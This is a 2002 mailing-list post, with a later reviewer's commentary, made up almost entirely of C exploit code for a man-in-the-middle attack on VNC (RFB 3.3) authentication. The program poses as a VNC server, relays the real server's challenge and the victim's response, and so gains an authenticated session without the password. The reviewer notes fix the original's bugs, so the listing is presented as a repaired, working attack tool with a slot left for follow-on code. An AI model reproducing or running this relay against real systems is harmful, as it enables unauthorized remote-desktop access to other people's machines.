VNC Man in the Middle Exploit Code
From: "SynRak" <synrak () hotmail com>
Date: Sun, 8 Dec 2002 22:42:26 -0500
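/*
 * Original post text (SynRak, Full Disclosure, 8 Dec 2002), kept for context:
 *
 *   "This was released a while back, and I have not been able to get it to
 *    function or find any additional information pertaining to this. Would
 *    anyone here possibly know how to get this to function successfully?
 *    Thanks all"
 *
 * Summary
 *   By using the below exploit code it is possible to use a VNC server
 *   without knowing its password by causing a client to authenticate through
 *   the attacking host, while the attacker redirects it to the server.
 *
 * Details
 *   Exploit (reviewed listing).
 *
 * What is being relayed (RFB 3.3, the version the listing negotiates):
 *   server -> client  "RFB 003.003\n"          (12 bytes)
 *   client -> server  its own version string    (12 bytes)
 *   server -> client  security type, BE u32     (4 bytes; 2 = VNC auth)
 *   server -> client  random challenge          (16 bytes)
 *   client -> server  DES(challenge, password)  (16 bytes)
 *   server -> client  SecurityResult, BE u32    (4 bytes; 0 = OK)
 * The program plays "server" to the victim client up to the security type,
 * fetches the real server's challenge, hands it to the victim, and forwards
 * the victim's response to the real server. The password itself never has
 * to be known; only the client's response to the server's challenge is used.
 *
 * Reviewer notes on the listing as posted -- the most likely reason it
 * hung rather than worked:
 *   - Every message was fetched with one unbounded read() into a 512-byte
 *     buffer. TCP does not preserve message boundaries: the real server
 *     sends the 4-byte security type and the 16-byte challenge back to
 *     back, so a single read() can return all 20 bytes and the next read()
 *     then blocks forever waiting for data that was already consumed (and
 *     the 16 bytes forwarded to the victim would be type+partial challenge).
 *     Fixed-size messages are now read with read_exact().
 *   - buf[nbytes] = 0 after a full 512-byte read wrote one byte past the
 *     array; "#define BUFSIZ 512" also redefined the stdio.h macro.
 *   - stdio.h, stdlib.h, unistd.h, arpa/inet.h were missing, accept()'s
 *     length argument must be socklen_t, and no socket was closed on the
 *     error paths. Cleanup is now centralised.
 *   - The real server's security type was never checked; if it offers
 *     anything other than VNC authentication the relay cannot work, so it
 *     now stops instead of forwarding garbage.
 */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"     /* real VNC server; must be edited before use */
#define QUEUE 8

/* RFB 3.3 wire sizes. */
#define RFB_VERSION_LEN   12    /* "RFB xxx.yyy\n" */
#define RFB_SECTYPE_LEN    4    /* big-endian u32 security type */
#define RFB_CHALLENGE_LEN 16
#define RFB_RESPONSE_LEN  16
#define RFB_RESULT_LEN     4    /* big-endian u32 SecurityResult */

static const char rfb_version[] = "RFB 003.003\n";

/*
 * Read exactly `len` bytes from `fd` into `buf`.
 * Returns 0 on success, -1 on error or EOF (errno set; ECONNRESET on EOF).
 * A plain read() may return part of a message or several messages at once,
 * so fixed-size protocol fields must be read this way.
 */
static int read_exact(int fd, void *buf, size_t len)
{
    unsigned char *p = buf;
    size_t got = 0;

    while (got < len) {
        ssize_t n = read(fd, p + got, len - got);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        if (n == 0) {
            errno = ECONNRESET;     /* peer closed in the middle of a message */
            return -1;
        }
        got += (size_t)n;
    }
    return 0;
}

/*
 * Write all `len` bytes of `buf` to `fd`, continuing after short writes.
 * Returns 0 on success, -1 on error (errno set).
 */
static int write_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    size_t sent = 0;

    while (sent < len) {
        ssize_t n = write(fd, p + sent, len - sent);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        sent += (size_t)n;
    }
    return 0;
}

/*
 * Entry point: listen on VNCPORT for one victim client, then relay the
 * RFB 3.3 VNC-authentication handshake between it and VNCSERVER.
 * Exit status is 0 when the real server reports SecurityResult OK, -1 on
 * any error or on a failed authentication. As in the original listing,
 * nothing is done with the authenticated session after the handshake.
 */
int main(int argc, char **argv)
{
    int listenfd = -1, clientfd = -1, vncfd = -1;
    int rc = -1;
    struct sockaddr_in server, client, vnc;
    socklen_t len = sizeof client;
    unsigned char sectype[RFB_SECTYPE_LEN];
    unsigned char challenge[RFB_CHALLENGE_LEN];
    unsigned char response[RFB_RESPONSE_LEN];
    unsigned char result[RFB_RESULT_LEN];
    char version[RFB_VERSION_LEN + 1];

    (void)argc;
    (void)argv;

    /* ---- fake VNC server: wait for the victim client ---- */
    listenfd = socket(AF_INET, SOCK_STREAM, 0);
    if (listenfd == -1) {
        perror("socket");
        goto out;
    }
    memset(&server, 0, sizeof server);
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(VNCPORT);
    if (bind(listenfd, (struct sockaddr *)&server, sizeof server) == -1) {
        perror("bind");
        goto out;
    }
    if (listen(listenfd, QUEUE) == -1) {
        perror("listen");
        goto out;
    }
    clientfd = accept(listenfd, (struct sockaddr *)&client, &len);
    if (clientfd == -1) {
        perror("accept");
        goto out;
    }

    /* Protocol version exchange with the victim (server speaks first). */
    if (write_all(clientfd, rfb_version, RFB_VERSION_LEN) == -1) {
        perror("write (version to client)");
        goto out;
    }
    if (read_exact(clientfd, version, RFB_VERSION_LEN) == -1) {
        perror("read (client version)");
        goto out;
    }
    version[RFB_VERSION_LEN] = '\0';
    printf("client version -> %s", version);  /* string already ends in '\n' */

    /* Tell the victim to use VNC authentication (security type 2, BE). */
    sectype[0] = 0x00;
    sectype[1] = 0x00;
    sectype[2] = 0x00;
    sectype[3] = 0x02;
    if (write_all(clientfd, sectype, RFB_SECTYPE_LEN) == -1) {
        perror("write (security type to client)");
        goto out;
    }

    /* ---- connect to the real VNC server ---- */
    vncfd = socket(AF_INET, SOCK_STREAM, 0);
    if (vncfd == -1) {
        perror("socket");
        goto out;
    }
    memset(&vnc, 0, sizeof vnc);
    vnc.sin_family = AF_INET;
    vnc.sin_addr.s_addr = inet_addr(VNCSERVER);
    if (vnc.sin_addr.s_addr == INADDR_NONE) {
        /* The shipped placeholder "x.x.x.x" lands here until it is edited. */
        fprintf(stderr, "bad VNCSERVER address: %s\n", VNCSERVER);
        goto out;
    }
    vnc.sin_port = htons(VNCPORT);
    if (connect(vncfd, (struct sockaddr *)&vnc, sizeof vnc) == -1) {
        perror("connect");
        goto out;
    }

    /* Version exchange with the real server. */
    if (read_exact(vncfd, version, RFB_VERSION_LEN) == -1) {
        perror("read (server version)");
        goto out;
    }
    version[RFB_VERSION_LEN] = '\0';
    printf("server version -> %s", version);
    if (write_all(vncfd, rfb_version, RFB_VERSION_LEN) == -1) {
        perror("write (version to server)");
        goto out;
    }

    /* Security type chosen by the real server; only VNC auth can be relayed. */
    if (read_exact(vncfd, sectype, RFB_SECTYPE_LEN) == -1) {
        perror("read (server security type)");
        goto out;
    }
    if (sectype[0] != 0 || sectype[1] != 0 || sectype[2] != 0 || sectype[3] != 2) {
        fprintf(stderr, "server did not offer VNC authentication (type %u)\n",
                (unsigned)sectype[3]);
        goto out;
    }

    /* Relay the server's 16-byte challenge to the victim ... */
    if (read_exact(vncfd, challenge, RFB_CHALLENGE_LEN) == -1) {
        perror("read (challenge)");
        goto out;
    }
    if (write_all(clientfd, challenge, RFB_CHALLENGE_LEN) == -1) {
        perror("write (challenge to client)");
        goto out;
    }

    /* ... and the victim's 16-byte response back to the server. */
    if (read_exact(clientfd, response, RFB_RESPONSE_LEN) == -1) {
        perror("read (response)");
        goto out;
    }
    if (write_all(vncfd, response, RFB_RESPONSE_LEN) == -1) {
        perror("write (response to server)");
        goto out;
    }

    /* SecurityResult: 0 = OK, 1 = failed, 2 = too many attempts (RFB 3.3). */
    if (read_exact(vncfd, result, RFB_RESULT_LEN) == -1) {
        perror("read (auth result)");
        goto out;
    }
    printf("auth result -> %u\n", (unsigned)result[3]);
    if (result[0] == 0 && result[1] == 0 && result[2] == 0 && result[3] == 0) {
        /* vncfd is now an authenticated RFB session. The original listing
         * left this spot as "place whatever code you want here" and simply
         * closed the sockets; that behaviour is kept. */
        rc = 0;
    }

out:
    if (clientfd != -1) {
        close(clientfd);
    }
    if (listenfd != -1) {
        close(listenfd);
    }
    if (vncfd != -1) {
        close(vncfd);
    }
    return rc;
}
/*
 * Additional information
 *   The information has been provided by rsmc.
 */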